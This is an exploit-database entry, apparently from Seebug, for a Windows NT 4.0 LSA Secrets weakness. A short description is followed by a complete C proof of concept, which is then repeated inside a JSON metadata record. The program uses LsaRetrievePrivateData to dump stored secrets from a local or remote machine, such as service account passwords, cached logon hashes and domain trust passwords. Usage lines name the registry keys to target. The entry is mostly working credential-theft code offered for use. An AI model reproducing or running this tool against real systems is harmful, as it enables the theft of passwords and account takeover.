Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 LSA Secrets Vulnerability
2014-07-01T00:00:00
ID SSV:73138 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
source: http://www.securityfocus.com/bid/231/info
The HKeyLocalMachine\SECURITY\Policy\Secrets\ key contains obfuscated data for various system services/resources. Clear-text usernames and passwords for services running under the context of a user account, password hashes and usernames for the last ten users to log on to the domain from the local host, domain trust passwords, passwords for web and ftp services, and dial-up networking usernames, passwords and phone numbers can be obtained and "decrypted" from the Policy\Secrets key.
Must be run with administrative privileges
run as: prog _sc_schedule [machine], prog nl$1, prog w3_root_data
or any other registry key under NTLM\security\policy\secrets.
<---begin--->
#include <windows.h>
#include <stdio.h>
#include "ntsecapi.h"
#define AST(x) if (!(x)) {printf("Failed line %d\n", __LINE__);exit(1);} else
void write();
PLSA_UNICODE_STRING
str(LPWSTR x)
{
static LSA_UNICODE_STRING s;
s.Buffer=x;
s.Length=wcslen(x)*sizeof(WCHAR);
s.MaximumLength = (wcslen(x)+1)*2;
return &s;
}
int _cdecl
main(int argc, char *argv[])
{
LSA_HANDLE pol;
PLSA_UNICODE_STRING foo;
LSA_OBJECT_ATTRIBUTES attrs;
WCHAR keyname[256]=L"";
WCHAR host[256]=L"";
wsprintfW(keyname, L"%hS", argv[1]);
if(argc == 3) wsprintfW(host, L"%hS", argv[2]);
memset(&attrs, 0, sizeof(attrs));
AST(!LsaOpenPolicy(str(host), &attrs, 0, &pol));
AST(!LsaRetrievePrivateData(pol, str(keyname), &foo));
write(1, foo->Buffer, foo->Length);
LsaClose(pol);
exit(0);
}
<---end--->
{"href": "https://www.seebug.org/vuldb/ssvid-73138", "status": "poc", "history": [], "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 LSA Secrets Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-73138", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n source: http://www.securityfocus.com/bid/231/info\r\n\r\n\r\nThe HKeyLocalMachine\\SECURITY\\Policy\\Secrets\\ key contains obfuscated data for various system services/resources. Clear-text usernames and passwords for services running under the context of a user account, password hashes and usernames for the last ten users to log on to the domain from the local host, domain trust passwords, passwords for web and ftp services, and dial-up networking usernames, passwords and phone numbers can be obtained and "decrypted" from the Policy\\Secrets key. \r\n\r\nMust be run with administrative privileges\r\n\r\nrun as: prog _sc_schedule [machine], prog nl$1, prog w3_root_data\r\nor any other registry key under NTLM\\security\\policy\\secrets.\r\n\r\n<---begin--->\r\n#include <windows.h>\r\n#include <stdio.h>\r\n\r\n#include "ntsecapi.h"\r\n#define AST(x) if (!(x)) {printf("Failed line %d\\n", __LINE__);exit(1);} else\r\nvoid write();\r\n\r\nPLSA_UNICODE_STRING\r\nstr(LPWSTR x)\r\n{\r\nstatic LSA_UNICODE_STRING s;\r\n\r\ns.Buffer=x;\r\ns.Length=wcslen(x)*sizeof(WCHAR);\r\ns.MaximumLength = (wcslen(x)+1)*2;\r\nreturn &s;\r\n}\r\n\r\nint _cdecl\r\nmain(int argc, char *argv[])\r\n{\r\nLSA_HANDLE pol;\r\nPLSA_UNICODE_STRING foo;\r\nLSA_OBJECT_ATTRIBUTES attrs;\r\nWCHAR keyname[256]=L"";\r\nWCHAR host[256]=L"";\r\n\r\nwsprintfW(keyname, L"%hS", argv[1]);\r\nif(argc == 3) wsprintfW(host, L"%hS", argv[2]);\r\nmemset(&attrs, 0, sizeof(attrs));\r\nAST(!LsaOpenPolicy(str(host), &attrs, 0, &pol));\r\nAST(!LsaRetrievePrivateData(pol, str(keyname), &foo));\r\nwrite(1, foo->Buffer, foo->Length);\r\nLsaClose(pol);\r\nexit(0);\r\n}\r\n<---end---> \n ", "id": "SSV:73138", "enchantments_done": [], "_object_type": "robots.models.seebug.SeebugBulletin", "type": "seebug", "lastseen": "2017-11-19T16:14:55", "reporter": "Root", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2017-11-19T16:14:55"}, "vulnersScore": 7.2}, "objectVersion": "1.4", "references": []}